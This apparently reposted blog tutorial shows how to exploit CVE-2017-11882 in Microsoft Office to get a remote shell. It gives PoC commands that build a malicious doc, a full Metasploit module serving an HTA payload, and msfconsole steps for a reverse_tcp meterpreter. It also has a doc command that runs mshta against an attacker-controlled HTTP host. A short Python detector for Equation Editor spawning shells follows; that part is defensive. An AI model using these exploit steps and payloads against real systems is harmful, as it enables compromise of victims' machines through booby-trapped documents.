Office exploit-Get shell

Source: Internet
Author: User

Environment:

Kali system, Windows system

Process:

Generate the exploit file on the Kali system and have Kali listen on a local port; when the Windows system opens the DOC file, it is compromised.

  

The first method, suitable for testing:

Download code from git:

git clone https://github.com/Ridter/CVE-2017-11882

Run the following command to generate a doc in the current directory:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o Test.doc

This generates a Test.doc file; if a vulnerable computer opens the file, a calculator pops up.

The second method uses a reverse connection to get a shell:

Kali System Preparation:

Copy the following Ruby code to the file /usr/share/metasploit-framework/modules/exploits/windows/smb/cve_2017_11882.rb (mind the code indentation):

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Microsoft Office Payload Delivery',
      'Description'   => %q{
        This module generates a command to place within a Word document, that
        when executed, will retrieve an HTA payload via HTTP from a web server.
        Currently has not figured out how to generate a doc.
      },
      'License'       => MSF_LICENSE,
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'Targets'       =>
        [
          ['Automatic', {}],
        ],
      'DefaultTarget' => 0,
    ))
  end

  # Serve the payload, wrapped as an HTA, to any client that requests the URI.
  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  # Print the command that the document has to run.
  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end

Start the PostgreSQL service that MSF uses from the command line:

service postgresql start

Then start MSF:

sudo msfconsole

Reload all modules:

reload_all

Find the cve_2017_11882 module we just created:

search cve_2017_11882

Load this module:

Use the reverse-connection payload, set the local address, and set the URI path:

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.105
set uripath aaaa
exploit

Generate the exploit file Test1.doc

Use ifconfig to find the current machine's IP, then run the following command in the directory of the cloned project; it generates a Test1.doc file on the current system:

python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.108/aaaa" -o Test1.doc

(Note that the name aaaa must be the same as the MSF uripath and cannot be changed arbitrarily)

Place the generated Test1.doc on the Windows system and open it; MSF returns a shell.
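Seen from the detection side, both methods above end with Equation Editor (EQNEDT32.EXE, the component affected by CVE-2017-11882) starting a child process such as cmd.exe or mshta with a URL. The following is an added example, not part of the original post: it flags those two patterns in process-creation events. The field names, the Equation Editor install path and the sample events are constructed assumptions, modelled on Sysmon Event ID 1.

```python
import re

# Equation Editor has no legitimate reason to start script hosts or shells.
EQUATION_EDITOR = "eqnedt32.exe"
SUSPICIOUS_CHILDREN = {"mshta.exe", "cmd.exe", "powershell.exe"}
# mshta given an http(s) URL, as in the command embedded in Test1.doc.
REMOTE_HTA = re.compile(r"\bmshta(\.exe)?\b.*https?://", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons a process-creation event is suspicious."""
    reasons = []
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    if parent == EQUATION_EDITOR and child in SUSPICIOUS_CHILDREN:
        reasons.append("equation-editor-spawned-" + child)
    if REMOTE_HTA.search(event.get("command_line", "")):
        reasons.append("mshta-remote-url")
    return reasons


def scan(events):
    """Return (event, reasons) pairs for events with at least one finding."""
    return [(e, r) for e in events if (r := classify(e))]


# Constructed sample events; keys are hypothetical names for the
# Image, ParentImage and CommandLine fields of a process-creation log.
EQNEDT = r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent_image": EQNEDT,
     "command_line": "mshta http://192.168.0.108/aaaa"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": EQNEDT,
     "command_line": "cmd.exe /c calc.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(reasons, event["command_line"])
```

The same parent/child condition can be expressed as a rule in whatever EDR or SIEM collects the process-creation events.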

Related resources:

POC Project address: https://github.com/Ridter/CVE-2017-11882/

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

NONO
Source: http://www.cnblogs.com/diligenceday/
Enterprise Website: http://www.idrwl.com/
Open Source Blog: http://www.github.com/sqqihao
